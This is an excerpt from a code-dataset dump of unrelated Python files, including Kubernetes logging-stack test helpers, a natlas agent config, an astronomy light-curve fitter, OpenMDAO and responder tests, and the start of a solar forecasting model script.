Dataset columns (type, observed range):
    max_stars_repo_path   string    length 3 to 269
    max_stars_repo_name   string    length 4 to 119
    max_stars_count       int64     0 to 191k
    id                    string    length 1 to 7
    content               string    length 6 to 1.05M
    score                 float64   0.23 to 5.13
    int_score             int64     0 to 5
tests/k8s_handler.py
josebalius/go-spacemesh
586
1800
from datetime import datetime

from kubernetes import client
from kubernetes.client.rest import ApiException
import os
import time
import yaml

from tests import config as conf
import tests.utils as ut


def remove_clusterrole_binding(shipper_name, crb_name):
    # remove clusterrolebind
    k8s_client = client.RbacAuthorizationV1Api()
    try:
        k8s_client.delete_cluster_role_binding(crb_name)
        print(f"\nsuccessfully deleted: {crb_name}")
    except Exception:
        print(f"\n{shipper_name} cluster role binding deletion has failed, please manually delete {crb_name}:")
        print(f"kubectl delete clusterrolebinding {crb_name}")


def filebeat_teardown(namespace):
    # remove clusterrolebind
    # TODO: find a solution for sharing the name both here and in the kube object
    crb_name = f"filebeat-cluster-role-binding-{namespace}"
    remove_clusterrole_binding("filebeat", crb_name)


def fluent_bit_teardown(namespace):
    # remove clusterrolebind
    # TODO: find a solution for sharing the name both here and in the kube object
    crb_name = f"fluent-bit-clusterrole-binding-{namespace}"
    remove_clusterrole_binding("fluent-bit", crb_name)


def add_elastic_cluster(namespace):
    print("\nDeploying ElasticSearch\n")
    add_deployment_dir(namespace, conf.ELASTIC_CONF_DIR)


def add_filebeat_cluster(namespace):
    print("\nDeploying FileBeat\n")
    add_deployment_dir(namespace, conf.FILEBEAT_CONF_DIR)


def add_fluent_bit_cluster(namespace):
    print("\nDeploying Fluent-bit\n")
    add_deployment_dir(namespace, conf.FLUENT_BIT_CONF_DIR)


def add_kibana_cluster(namespace):
    print("\nDeploying Kibana\n")
    add_deployment_dir(namespace, conf.KIBANA_CONF_DIR)


def add_logstash_cluster(namespace):
    print("\nDeploying LogStash\n")
    add_deployment_dir(namespace, conf.LOGSTASH_CONF_DIR)


def add_deployment_dir(namespace, dir_path, delete=False):
    with open(os.path.join(dir_path, 'dep_order.txt')) as f:
        dep_order = f.readline()
        dep_lst = [x.strip() for x in dep_order.split(',')]
        print(dep_lst)

    phrases_to_replace = ["(?<!_)NAMESPACE", "REP_ES_USER", "REP_ES_PASS"]
    values_for_replacement = [namespace, conf.ES_USER_LOCAL, conf.ES_PASS_LOCAL]
    for filename in dep_lst:
        # replace all phrases with the actual values if exists
        modified_file_path, is_change = ut.duplicate_file_and_replace_phrases(
            dir_path, filename, f"{namespace}_{filename}", phrases_to_replace, values_for_replacement
        )
        print(f"applying file: {filename}")
        with open(modified_file_path) as f:
            dep = yaml.safe_load(f)

        if modified_file_path != os.path.join(dir_path, filename) and is_change:
            # remove modified file
            ut.delete_file(modified_file_path)

        name = dep["metadata"]["name"]
        if dep['kind'] == 'StatefulSet':
            k8s_client = client.AppsV1Api()
            if not delete:
                k8s_client.create_namespaced_stateful_set(body=dep, namespace=namespace)
            else:
                k8s_client.delete_namespaced_stateful_set(name=name, namespace=namespace)
        # note: unlike StatefulSet, the remaining kinds are always created here,
        # even when delete=True; deletion goes through remove_deployment_dir below
        elif dep['kind'] == 'DaemonSet':
            k8s_client = client.AppsV1Api()
            k8s_client.create_namespaced_daemon_set(body=dep, namespace=namespace)
        elif dep['kind'] == 'Deployment':
            k8s_client = client.AppsV1Api()
            k8s_client.create_namespaced_deployment(body=dep, namespace=namespace)
        elif dep['kind'] == 'Service':
            try:
                k8s_client = client.CoreV1Api()
                k8s_client.create_namespaced_service(body=dep, namespace=namespace)
            except ApiException as e:
                if e.status == 409:
                    print(f"Service exists: {dep['metadata']['name']}")
                    continue
                raise e
        elif dep['kind'] == 'PodDisruptionBudget':
            k8s_client = client.PolicyV1beta1Api()
            k8s_client.create_namespaced_pod_disruption_budget(body=dep, namespace=namespace)
        elif dep["kind"] == 'Role':
            k8s_client = client.RbacAuthorizationV1Api()
            k8s_client.create_namespaced_role(body=dep, namespace=namespace)
        elif dep["kind"] == 'ClusterRole':
            try:
                k8s_client = client.RbacAuthorizationV1Api()
                k8s_client.create_cluster_role(body=dep)
            except ApiException as e:
                if e.status == 409:
                    print("cluster role already exists")
                    continue
                raise e
        elif dep["kind"] == 'RoleBinding':
            k8s_client = client.RbacAuthorizationV1Api()
            dep["subjects"][0]["namespace"] = namespace
            k8s_client.create_namespaced_role_binding(body=dep, namespace=namespace)
        elif dep["kind"] == 'ClusterRoleBinding':
            k8s_client = client.RbacAuthorizationV1Api()
            try:
                k8s_client.create_cluster_role_binding(body=dep)
            except ApiException as e:
                if e.status == 409:
                    print("cluster role binding already exists")
                    continue
                raise e
        elif dep["kind"] == 'ConfigMap':
            k8s_client = client.CoreV1Api()
            k8s_client.create_namespaced_config_map(body=dep, namespace=namespace)
        elif dep["kind"] == 'ServiceAccount':
            k8s_client = client.CoreV1Api()
            k8s_client.create_namespaced_service_account(body=dep, namespace=namespace)
    print("\nDone\n")


def remove_deployment_dir(namespace, dir_path):
    with open(os.path.join(dir_path, 'dep_order.txt')) as f:
        dep_order = f.readline()
        dep_lst = [x.strip() for x in dep_order.split(',')]
        print(dep_lst)

    for filename in dep_lst:
        print(f"deleting {filename}")
        with open(os.path.join(dir_path, filename)) as f:
            dep = yaml.safe_load(f)

        name = dep["metadata"]["name"]
        if dep['kind'] == 'StatefulSet':
            k8s_client = client.AppsV1Api()
            k8s_client.delete_namespaced_stateful_set(name=name, namespace=namespace)
        elif dep['kind'] == 'DaemonSet':
            k8s_client = client.AppsV1Api()
            k8s_client.delete_namespaced_daemon_set(name=name, namespace=namespace)
        elif dep['kind'] == 'Deployment':
            k8s_client = client.AppsV1Api()
            k8s_client.delete_namespaced_deployment(name=name, namespace=namespace)
        elif dep['kind'] == 'Service':
            k8s_client = client.CoreV1Api()
            k8s_client.delete_namespaced_service(name=name, namespace=namespace, grace_period_seconds=0)
            delete_func = k8s_client.delete_namespaced_service
            list_func = k8s_client.list_namespaced_service
            wait_for_namespaced_deletion(name, namespace, delete_func, list_func)
        elif dep['kind'] == 'PodDisruptionBudget':
            k8s_client = client.PolicyV1beta1Api()
            k8s_client.delete_namespaced_pod_disruption_budget(name=name, namespace=namespace)
        elif dep["kind"] == 'Role':
            k8s_client = client.RbacAuthorizationV1Api()
            k8s_client.delete_namespaced_role(name=name, namespace=namespace)
        elif dep["kind"] == 'RoleBinding':
            k8s_client = client.RbacAuthorizationV1Api()
            k8s_client.delete_namespaced_role_binding(name=name, namespace=namespace)
        elif dep["kind"] == 'ClusterRoleBinding':
            k8s_client = client.RbacAuthorizationV1Api()
            k8s_client.delete_cluster_role_binding(name=name)
        elif dep["kind"] == 'ConfigMap':
            k8s_client = client.CoreV1Api()
            k8s_client.delete_namespaced_config_map(name=name, namespace=namespace)
        elif dep["kind"] == 'ServiceAccount':
            k8s_client = client.CoreV1Api()
            k8s_client.delete_namespaced_service_account(name=name, namespace=namespace)
    print("\nDone\n")


def wait_for_namespaced_deletion(name, namespace, deletion_func, list_func, timeout=15):
    deleted = False
    orig_timeout = timeout
    while not deleted:
        # find by name and delete requested item
        for item in list_func(namespace).items:
            if item.metadata.name == name:
                if timeout < 0:
                    raise TimeoutError(f"{orig_timeout} was not enough for deleting item:\n{item}\n")
                deletion_func(name=name, namespace=namespace)
                print(f"service {name} was not deleted, retrying")
                time.sleep(1)
                timeout -= 1
        # validate item was deleted
        # (deleted is assumed True up front so an empty listing counts as deleted)
        deleted = True
        for item in list_func(namespace).items:
            if item.metadata.name == name:
                deleted = False
    return deleted


def wait_for_daemonset_to_be_ready(name, namespace, timeout=None):
    wait_for_to_be_ready("daemonset", name, namespace, timeout=timeout)


def resolve_read_status_func(obj_name):
    if obj_name == "daemonset":
        return client.AppsV1Api().read_namespaced_daemon_set_status
    else:
        raise ValueError(f"resolve_read_status_func: {obj_name} is not a valid value")


def wait_for_to_be_ready(obj_name, name, namespace, timeout=None):
    start = datetime.now()
    while True:
        read_func = resolve_read_status_func(obj_name)
        resp = read_func(name=name, namespace=namespace)
        total_sleep_time = (datetime.now() - start).total_seconds()
        number_ready = resp.status.number_ready
        updated_number_scheduled = resp.status.updated_number_scheduled
        if number_ready and updated_number_scheduled and number_ready == updated_number_scheduled:
            print("Total time waiting for {3} {0} [size: {1}]: {2} sec".format(
                name, number_ready, total_sleep_time, obj_name))
            break
        print("{0}/{1} pods ready {2} sec ".format(
            number_ready, updated_number_scheduled, total_sleep_time), end="\r")
        time.sleep(1)
        if timeout and total_sleep_time > timeout:
            raise Exception(f"Timeout waiting for {obj_name} to be ready")
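A minimal driver sketch showing how these helpers compose. This is illustrative only: it assumes a reachable cluster, a valid kubeconfig, and that `tests.config` defines the `*_CONF_DIR` paths; the namespace name is made up. The kubeconfig load is the standard kubernetes-client call.

# Hypothetical usage; not part of the file above.
from kubernetes import config

config.load_kube_config()          # standard client setup; assumes a valid kubeconfig
namespace = "logging-test"         # assumed namespace, created elsewhere
add_elastic_cluster(namespace)     # applies every manifest listed in dep_order.txt
add_fluent_bit_cluster(namespace)
wait_for_daemonset_to_be_ready("fluent-bit", namespace, timeout=120)
fluent_bit_teardown(namespace)     # removes the cluster role binding again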
2.15625
2
natlas-agent/config.py
m4rcu5/natlas
0
1801
import os

from dotenv import load_dotenv


class Config:

    # Current Version
    NATLAS_VERSION = "0.6.10"

    BASEDIR = os.path.abspath(os.path.dirname(__file__))
    load_dotenv(os.path.join(BASEDIR, '.env'))

    def get_int(self, varname):
        tmp = os.environ.get(varname)
        if tmp:
            return int(tmp)
        return None

    def get_bool(self, varname):
        tmp = os.environ.get(varname)
        if tmp and tmp.upper() == "TRUE":
            return True
        if tmp and tmp.upper() == "FALSE":
            return False
        return None

    def __init__(self):
        # url of server to get/submit work from/to
        self.server = os.environ.get('NATLAS_SERVER_ADDRESS') or 'http://127.0.0.1:5000'

        # ignore warnings about SSL connections
        # you shouldn't ignore ssl warnings, but I'll give you the option
        # Instead, you should put the trusted CA certificate bundle on the agent
        # and use the REQUESTS_CA_BUNDLE env variable
        self.ignore_ssl_warn = self.get_bool('NATLAS_IGNORE_SSL_WARN') or False

        # maximum number of threads to utilize
        self.max_threads = self.get_int('NATLAS_MAX_THREADS') or 3

        # Are we allowed to scan local addresses?
        # By default, agents protect themselves from scanning their local network
        self.scan_local = self.get_bool('NATLAS_SCAN_LOCAL') or False

        # default time to wait for the server to respond
        self.request_timeout = self.get_int('NATLAS_REQUEST_TIMEOUT') or 15  # seconds

        # Maximum value for exponential backoff of requests, 5 minutes default
        self.backoff_max = self.get_int('NATLAS_BACKOFF_MAX') or 300  # seconds

        # Base value to begin the exponential backoff
        self.backoff_base = self.get_int('NATLAS_BACKOFF_BASE') or 1  # seconds

        # Maximum number of times to retry submitting data before giving up
        # This is useful if a thread is submitting data that the server doesn't understand for some reason
        self.max_retries = self.get_int('NATLAS_MAX_RETRIES') or 10

        # Identification string that identifies the agent that performed any given scan
        # Used for database lookup and stored in scan output
        self.agent_id = os.environ.get("NATLAS_AGENT_ID") or None

        # Authentication token that agents can use to talk to the server API
        # Only needed if the server is configured to require agent authentication
        self.auth_token = os.environ.get("NATLAS_AGENT_TOKEN") or None

        # Optionally save files that failed to upload
        self.save_fails = self.get_bool("NATLAS_SAVE_FAILS") or False

        # Allow version overrides for local development
        # Necessary to test versioned host data templates before release
        self.version_override = os.environ.get("NATLAS_VERSION_OVERRIDE") or None

        self.sentry_dsn = os.environ.get("SENTRY_DSN") or None

        if self.version_override:
            self.NATLAS_VERSION = self.version_override
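A short sketch of how this config is typically consumed. The env-var names come straight from the class above; the values set here are illustrative only.

# Illustrative only: exercise Config with environment overrides.
import os

os.environ["NATLAS_MAX_THREADS"] = "8"
os.environ["NATLAS_SCAN_LOCAL"] = "true"   # get_bool() upper-cases, so case is irrelevant

config = Config()
print(config.server)       # falls back to http://127.0.0.1:5000 when unset
print(config.max_threads)  # 8
print(config.scan_local)   # True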
2.34375
2
rdr2019/mcmc_lc_jla_fit.py
rubind/host_unity
0
1802
import os
import sys
import pickle

import click
import sncosmo
import numpy as np
from astropy.table import Table

DATA_PATH = '/home/samdixon/jla_light_curves/'


def modify_error(lc, error_floor=0.):
    """Add an error floor of `error_floor` times the maximum flux of the band
    to each observation
    """
    data = sncosmo.photdata.photometric_data(lc).normalized(zp=25., zpsys='ab')
    new_lc = {'time': data.time,
              'band': data.band,
              'flux': data.flux,
              'fluxerr': data.fluxerr,
              'zp': data.zp,
              'zpsys': data.zpsys}
    for band in set(data.band):
        band_cut = data.band == band
        max_flux_in_band = np.max(data.flux[band_cut])
        new_lc['fluxerr'][band_cut] = np.sqrt((error_floor * max_flux_in_band)**2
                                              + data.fluxerr[band_cut]**2)
    new_lc = Table(new_lc, meta=lc.meta)
    return new_lc


def fit_lc_and_save(lc, model_name, save_dir, no_mc):
    name = lc.meta['SN']
    model = sncosmo.Model(source=model_name,
                          effects=[sncosmo.CCM89Dust()],
                          effect_names=['mw'],
                          effect_frames=['obs'])
    if type(name) is float:
        name = int(name)
    z = lc.meta['Z_HELIO']
    mwebv = lc.meta['MWEBV']
    bounds = {}
    try:
        t0 = float(lc.meta['DayMax'].split()[0])
        bounds['t0'] = (t0 - 5, t0 + 5)
    except KeyError:
        try:
            t0 = np.mean(lc['Date'])
            bounds['t0'] = (min(lc['Date']) - 20, max(lc['Date']))
        except KeyError:
            t0 = np.mean(lc['time'])
            bounds['t0'] = (min(lc['time']) - 20, max(lc['time']))
    bounds['z'] = ((1 - 1e-4) * z, (1 + 1e-4) * z)
    for param_name in model.source.param_names[1:]:
        bounds[param_name] = (-50, 50)
    modelcov = model_name == 'salt2'
    model.set(z=z, t0=t0, mwebv=mwebv)
    phase_range = (-15, 45) if model_name == 'salt2' else (-10, 40)
    wave_range = (3000, 7000) if model_name == 'salt2' else None
    save_path = os.path.join(save_dir, '{}.pkl'.format(name))
    try:
        minuit_result, minuit_fit_model = sncosmo.fit_lc(lc, model, model.param_names[:-2],
                                                         bounds=bounds,
                                                         phase_range=phase_range,
                                                         wave_range=wave_range,
                                                         warn=False,
                                                         modelcov=modelcov)
        if not no_mc:
            emcee_result, emcee_fit_model = sncosmo.mcmc_lc(
                sncosmo.select_data(lc, minuit_result['data_mask']),
                minuit_fit_model,
                model.param_names[:-2],
                guess_t0=False,
                bounds=bounds,
                warn=False,
                nwalkers=40,
                modelcov=modelcov)
            pickle.dump(emcee_result, open(save_path, 'wb'))
        else:
            pickle.dump(minuit_result, open(save_path, 'wb'))
    except Exception:  # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt pass through
        print('Fit to {} failed'.format(name))
        sys.stdout.flush()


def main():
    model_name, start, finish, err_floor, no_mc = sys.argv[1:]
    start = int(start)
    finish = int(finish)
    err_floor = float(err_floor)
    no_mc = bool(int(no_mc))
    if no_mc:
        save_dir = '/home/samdixon/host_unity/fitting/results_mw_reddening/jla_{}_{:02d}'.format(
            model_name, int(err_floor * 100))
    else:
        save_dir = '/home/samdixon/host_unity/fitting/results_mw_reddening_mcmc/jla_{}_{:02d}'.format(
            model_name, int(err_floor * 100))
    if not os.path.isdir(save_dir):
        os.makedirs(save_dir)
    lcs = []
    for f in os.listdir(DATA_PATH)[int(start):int(finish)]:
        if f[:2] == 'lc':
            lc = sncosmo.read_lc(os.path.join(DATA_PATH, f), format='salt2',
                                 expand_bands=True, read_covmat=True)
            lc = modify_error(lc, err_floor)
            name = lc.meta['SN']
            if type(name) is float:
                name = int(name)
            load_path = os.path.join(save_dir, '{}.pkl'.format(name))
            try:
                pickle.load(open(load_path, 'rb'))
                print('{}: loaded'.format(name))
                sys.stdout.flush()
            except IOError:
                print('Fitting {}'.format(name))
                sys.stdout.flush()
                fit_lc_and_save(lc, model_name, save_dir, no_mc)
        else:
            continue


if __name__ == '__main__':
    main()
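A hedged usage sketch for the error-floor helper, using sncosmo's bundled demo light curve rather than the hard-coded JLA path (which the script assumes exists on the author's machine):

# Exercise modify_error() on sncosmo's shipped example data; illustrative only.
import sncosmo

lc = sncosmo.load_example_data()            # small demo light curve bundled with sncosmo
lc_floored = modify_error(lc, error_floor=0.02)
print(lc_floored['fluxerr'][:5])            # errors now include a 2%-of-peak-flux floor per band

The command-line entry point unpacks five positional arguments, so a plausible invocation (values illustrative) is: python mcmc_lc_jla_fit.py salt2 0 100 0.02 1 — fit files 0..100 with SALT2, a 2% error floor, skipping the MCMC stage.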
2.046875
2
openmdao/core/tests/test_system.py
toddrme2178/OpenMDAO
0
1803
""" Unit tests for the system interface.""" import unittest from six import assertRaisesRegex from six.moves import cStringIO import numpy as np from openmdao.api import Problem, Group, IndepVarComp, ExecComp from openmdao.test_suite.components.options_feature_vector import VectorDoublingComp from openmdao.utils.assert_utils import assert_rel_error, assert_warning class TestSystem(unittest.TestCase): def test_vector_context_managers(self): g1 = Group() g1.add_subsystem('Indep', IndepVarComp('a', 5.0), promotes=['a']) g2 = g1.add_subsystem('G2', Group(), promotes=['*']) g2.add_subsystem('C1', ExecComp('b=2*a'), promotes=['a', 'b']) model = Group() model.add_subsystem('G1', g1, promotes=['b']) model.add_subsystem('Sink', ExecComp('c=2*b'), promotes=['b']) p = Problem(model=model) p.set_solver_print(level=0) # Test pre-setup errors with self.assertRaises(Exception) as cm: inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(str(cm.exception), "Group: Cannot get vectors because setup has not yet been called.") with self.assertRaises(Exception) as cm: d_inputs, d_outputs, d_residuals = model.get_linear_vectors('vec') self.assertEqual(str(cm.exception), "Group: Cannot get vectors because setup has not yet been called.") p.setup() p.run_model() # Test inputs with original values inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(inputs['G1.G2.C1.a'], 5.) inputs, outputs, residuals = g1.get_nonlinear_vectors() self.assertEqual(inputs['G2.C1.a'], 5.) # Test inputs after setting a new value inputs, outputs, residuals = g2.get_nonlinear_vectors() inputs['C1.a'] = -1. inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(inputs['G1.G2.C1.a'], -1.) inputs, outputs, residuals = g1.get_nonlinear_vectors() self.assertEqual(inputs['G2.C1.a'], -1.) # Test outputs with original values inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(outputs['G1.G2.C1.b'], 10.) inputs, outputs, residuals = g2.get_nonlinear_vectors() # Test outputs after setting a new value inputs, outputs, residuals = model.get_nonlinear_vectors() outputs['G1.G2.C1.b'] = 123. self.assertEqual(outputs['G1.G2.C1.b'], 123.) inputs, outputs, residuals = g2.get_nonlinear_vectors() outputs['C1.b'] = 789. self.assertEqual(outputs['C1.b'], 789.) # Test residuals inputs, outputs, residuals = model.get_nonlinear_vectors() residuals['G1.G2.C1.b'] = 99.0 self.assertEqual(residuals['G1.G2.C1.b'], 99.0) # Test linear d_inputs, d_outputs, d_residuals = model.get_linear_vectors('linear') d_outputs['G1.G2.C1.b'] = 10. self.assertEqual(d_outputs['G1.G2.C1.b'], 10.) 
# Test linear with invalid vec_name with self.assertRaises(Exception) as cm: d_inputs, d_outputs, d_residuals = model.get_linear_vectors('bad_name') self.assertEqual(str(cm.exception), "Group (<model>): There is no linear vector named %s" % 'bad_name') def test_set_checks_shape(self): indep = IndepVarComp() indep.add_output('a') indep.add_output('x', shape=(5, 1)) g1 = Group() g1.add_subsystem('Indep', indep, promotes=['a', 'x']) g2 = g1.add_subsystem('G2', Group(), promotes=['*']) g2.add_subsystem('C1', ExecComp('b=2*a'), promotes=['a', 'b']) g2.add_subsystem('C2', ExecComp('y=2*x', x=np.zeros((5, 1)), y=np.zeros((5, 1))), promotes=['x', 'y']) model = Group() model.add_subsystem('G1', g1, promotes=['b', 'y']) model.add_subsystem('Sink', ExecComp(('c=2*b', 'z=2*y'), y=np.zeros((5, 1)), z=np.zeros((5, 1))), promotes=['b', 'y']) p = Problem(model=model) p.setup() p.set_solver_print(level=0) p.run_model() msg = "Incompatible shape for '.*': Expected (.*) but got (.*)" num_val = -10 arr_val = -10*np.ones((5, 1)) bad_val = -10*np.ones((10)) inputs, outputs, residuals = g2.get_nonlinear_vectors() # # set input # # assign array to scalar with assertRaisesRegex(self, ValueError, msg): inputs['C1.a'] = arr_val # assign scalar to array inputs['C2.x'] = num_val assert_rel_error(self, inputs['C2.x'], arr_val, 1e-10) # assign array to array inputs['C2.x'] = arr_val assert_rel_error(self, inputs['C2.x'], arr_val, 1e-10) # assign bad array shape to array with assertRaisesRegex(self, ValueError, msg): inputs['C2.x'] = bad_val # assign list to array inputs['C2.x'] = arr_val.tolist() assert_rel_error(self, inputs['C2.x'], arr_val, 1e-10) # assign bad list shape to array with assertRaisesRegex(self, ValueError, msg): inputs['C2.x'] = bad_val.tolist() # # set output # # assign array to scalar with assertRaisesRegex(self, ValueError, msg): outputs['C1.b'] = arr_val # assign scalar to array outputs['C2.y'] = num_val assert_rel_error(self, outputs['C2.y'], arr_val, 1e-10) # assign array to array outputs['C2.y'] = arr_val assert_rel_error(self, outputs['C2.y'], arr_val, 1e-10) # assign bad array shape to array with assertRaisesRegex(self, ValueError, msg): outputs['C2.y'] = bad_val # assign list to array outputs['C2.y'] = arr_val.tolist() assert_rel_error(self, outputs['C2.y'], arr_val, 1e-10) # assign bad list shape to array with assertRaisesRegex(self, ValueError, msg): outputs['C2.y'] = bad_val.tolist() # # set residual # # assign array to scalar with assertRaisesRegex(self, ValueError, msg): residuals['C1.b'] = arr_val # assign scalar to array residuals['C2.y'] = num_val assert_rel_error(self, residuals['C2.y'], arr_val, 1e-10) # assign array to array residuals['C2.y'] = arr_val assert_rel_error(self, residuals['C2.y'], arr_val, 1e-10) # assign bad array shape to array with assertRaisesRegex(self, ValueError, msg): residuals['C2.y'] = bad_val # assign list to array residuals['C2.y'] = arr_val.tolist() assert_rel_error(self, residuals['C2.y'], arr_val, 1e-10) # assign bad list shape to array with assertRaisesRegex(self, ValueError, msg): residuals['C2.y'] = bad_val.tolist() def test_deprecated_solver_names(self): class DummySolver(): pass model = Group() # check nl_solver setter & getter msg = "The 'nl_solver' attribute provides backwards compatibility " \ "with OpenMDAO 1.x ; use 'nonlinear_solver' instead." 
with assert_warning(DeprecationWarning, msg): model.nl_solver = DummySolver() with assert_warning(DeprecationWarning, msg): solver = model.nl_solver self.assertTrue(isinstance(solver, DummySolver)) # check ln_solver setter & getter msg = "The 'ln_solver' attribute provides backwards compatibility " \ "with OpenMDAO 1.x ; use 'linear_solver' instead." with assert_warning(DeprecationWarning, msg): model.ln_solver = DummySolver() with assert_warning(DeprecationWarning, msg): solver = model.ln_solver self.assertTrue(isinstance(solver, DummySolver)) def test_deprecated_metadata(self): prob = Problem() prob.model.add_subsystem('inputs', IndepVarComp('x', shape=3)) prob.model.add_subsystem('double', VectorDoublingComp()) msg = "The 'metadata' attribute provides backwards compatibility " \ "with earlier version of OpenMDAO; use 'options' instead." with assert_warning(DeprecationWarning, msg): prob.model.double.metadata['size'] = 3 prob.model.connect('inputs.x', 'double.x') prob.setup() prob['inputs.x'] = [1., 2., 3.] prob.run_model() assert_rel_error(self, prob['double.y'], [2., 4., 6.]) def test_list_inputs_output_with_includes_excludes(self): from openmdao.test_suite.scripts.circuit_analysis import Resistor, Diode, Node, Circuit p = Problem() model = p.model model.add_subsystem('ground', IndepVarComp('V', 0., units='V')) model.add_subsystem('source', IndepVarComp('I', 0.1, units='A')) model.add_subsystem('circuit', Circuit()) model.connect('source.I', 'circuit.I_in') model.connect('ground.V', 'circuit.Vg') p.setup() p.run_model() # Inputs with no includes or excludes inputs = model.list_inputs(out_stream=None) self.assertEqual( len(inputs), 11) # Inputs with includes inputs = model.list_inputs(includes=['*V_out*'], out_stream=None) self.assertEqual( len(inputs), 3) # Inputs with includes matching a promoted name inputs = model.list_inputs(includes=['*Vg*'], out_stream=None) self.assertEqual( len(inputs), 2) # Inputs with excludes inputs = model.list_inputs(excludes=['*V_out*'], out_stream=None) self.assertEqual( len(inputs), 8) # Inputs with excludes matching a promoted name inputs = model.list_inputs(excludes=['*Vg*'], out_stream=None) self.assertEqual( len(inputs), 9) # Inputs with includes and excludes inputs = model.list_inputs(includes=['*V_out*'], excludes=['*Vg*'], out_stream=None) self.assertEqual( len(inputs), 1) # Outputs with no includes or excludes. Explicit only outputs = model.list_outputs(implicit=False, out_stream=None) self.assertEqual( len(outputs), 5) # Outputs with includes. Explicit only outputs = model.list_outputs(includes=['*I'], implicit=False, out_stream=None) self.assertEqual( len(outputs), 4) # Outputs with excludes. Explicit only outputs = model.list_outputs(excludes=['circuit*'], implicit=False, out_stream=None) self.assertEqual( len(outputs), 2) if __name__ == "__main__": unittest.main()
2.515625
3
code/src/db/create_db.py
fabiangunzinger/sample_project
0
1804
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import os
import sqlite3
import sys

import pandas as pd

from src import config


def parse_args(argv):
    parser = argparse.ArgumentParser()
    parser.add_argument('sample')
    parser.add_argument('replace')
    # pass argv through so the function actually honours its argument
    # (the original called parser.parse_args() and silently fell back to sys.argv)
    return parser.parse_args(argv)


def db_tables(connection):
    """List tables in database."""
    res = pd.read_sql("select name from sqlite_master", connection)
    return res.name.values


def create_database(sample):
    """Create database with tables for targets, outcomes, and predictions."""
    db_name = f'{sample}.db'
    db_path = os.path.join(config.DATADIR, db_name)
    conn = sqlite3.connect(db_path)

    usr_name = f'users_{sample}.csv'
    usr_path = os.path.join(config.DATADIR, usr_name)
    users = pd.read_csv(usr_path)

    db_tbls = db_tables(conn)
    for tbl in ['decisions', 'outcomes', 'predictions']:
        if tbl not in db_tbls:
            users.to_sql(tbl, conn, index=False)
            conn.execute(f"create index idx_{tbl}_user_id on {tbl}(user_id)")


def main(argv=None):
    if argv is None:
        # drop the script name; the original sliced sys.argv[:1],
        # which passed only the script name instead of the arguments
        argv = sys.argv[1:]
    args = parse_args(argv)
    create_database(args.sample)


if __name__ == '__main__':
    sys.exit(main())
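A hypothetical invocation, inferred from the two positional arguments (note the 'replace' argument is parsed but never used above):

#   ./create_db.py sample_01 yes
# expects users_sample_01.csv in config.DATADIR and creates sample_01.db there,
# with identical 'decisions', 'outcomes', and 'predictions' tables indexed on user_id.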
2.9375
3
tests/test_responder.py
craigderington/responder-persons-api
0
1805
# coding: utf-8

import pytest
import app as service
import yaml
import responder

from starlette.responses import PlainTextResponse


@pytest.fixture
def api():
    return service.api


def test_hello_world(api):
    r = api.requests.get("/api/v1.0/index")
    assert r.text == "Hello, World!"


def test_basic_route(api):
    @api.route("/api/v1.0/index")
    def index(req, resp):
        resp.text = "Hello, World!"


def test_requests_session(api):
    assert api.session()
    assert api.requests


def test_json_media(api):
    dump = {"life": 42}

    @api.route("/")
    def media(req, resp):
        resp.media = dump

    r = api.requests.get("http://;/")
    assert "json" in r.headers["Content-Type"]
    assert r.json() == dump


def test_yaml_media(api):
    dump = {"life": 42}

    @api.route("/")
    def media(req, resp):
        resp.media = dump

    r = api.requests.get("http://;/", headers={"Accept": "yaml"})
    assert "yaml" in r.headers["Content-Type"]
    assert yaml.load(r.content) == dump


def test_background(api):
    @api.route("/")
    def route(req, resp):
        @api.background.task
        def task():
            import time
            time.sleep(3)

        task()
        api.text = "ok"

    r = api.requests.get(api.url_for(route))
    assert r.ok


def test_500_error(api):
    def catcher(req, exc):
        return PlainTextResponse("Suppressed error", 500)

    api.app.add_exception_handler(ValueError, catcher)

    @api.route("/api/v1.0/index")
    def view(req, resp):
        raise ValueError

    r = api.requests.get(api.url_for(view))
    assert not r.ok
    assert r.content == b'Suppressed error'


def test_404_error(api):
    r = api.requests.get("/api/v1.0/foo")
    assert r.status_code == responder.API.status_codes.HTTP_404
2.265625
2
examples/solar/p25_nonsparse_cmmgp.py
axdahl/SC-MMGP
0
1806
# -*- coding: utf-8 -*- """ Script to execute example covarying MMGP regression forecasting model with full Krhh. Inputs: Data training and test sets (dictionary pickle) Data for example: - normalised solar data for 25 sites for 15 minute forecast - N_train = 4200, N_test = 2276, P = 25, D = 51 - Xtr[:, :50] 2 recent lagged observations for each site in order - Xtr[:, 50] time index - link inputs is a 25x2 array (link inputs repeated for every group) with normalised lat,long for each site in order Model Options: - Sparse or full x-function covariance prior Krhh (set bool SPARSE_PRIOR) - Diagonal or Kronecker-structured variational posterior covariance Sr (set bool DIAG_POST) - Sparse or full posterior covariance (when Kronecker posterior; set bool SPARSE_POST) Current Settings (sparse covarying mmgp model with sparse Kronecker posterior): DIAG_POST = False SPARSE_PRIOR = False # set True for equivalent sparse scmmgp model SPARSE_POST = True Note on specifying group structure for F: Grouping occurs via block_struct, a nested list of grouping order Where functions [i] are independent i.e. in own block, set link_kernel[i] = link_inputs[i] = 1.0 See model class preamble and example below for further details. """ import os import numpy as np import pickle import pandas as pd import traceback import time import sklearn.cluster import csv import sys import mmgp from mmgp import likelihoods from mmgp import kernels import tensorflow as tf from mmgp import datasets from mmgp import losses from mmgp import util dpath = '/experiments/datasets/' dfile = 'p25_inputsdict.pickle' dlinkfile = 'p25_linkinputsarray.pickle' outdir = '/experiments/results/p25_nonsparse_cmmgp/' try: os.makedirs(outdir) except FileExistsError: pass def get_inputs(): """ inputsdict contains {'Yte': Yte, 'Ytr': Ytr, 'Xtr': Xtr, 'Xte': Xte} where values are np.arrays np. arrays are truncated to evenly split into batches of size = batchsize returns inputsdict, Xtr_link (ndarray, shape = [P, D_link_features]) """ with open(os.path.join(dpath, dfile), 'rb') as f: d_all = pickle.load(f) with open(os.path.join(dpath, dlinkfile), 'rb') as f: d_link = pickle.load(f) return d_all, d_link def init_z(train_inputs, num_inducing): # Initialize inducing points using clustering. 
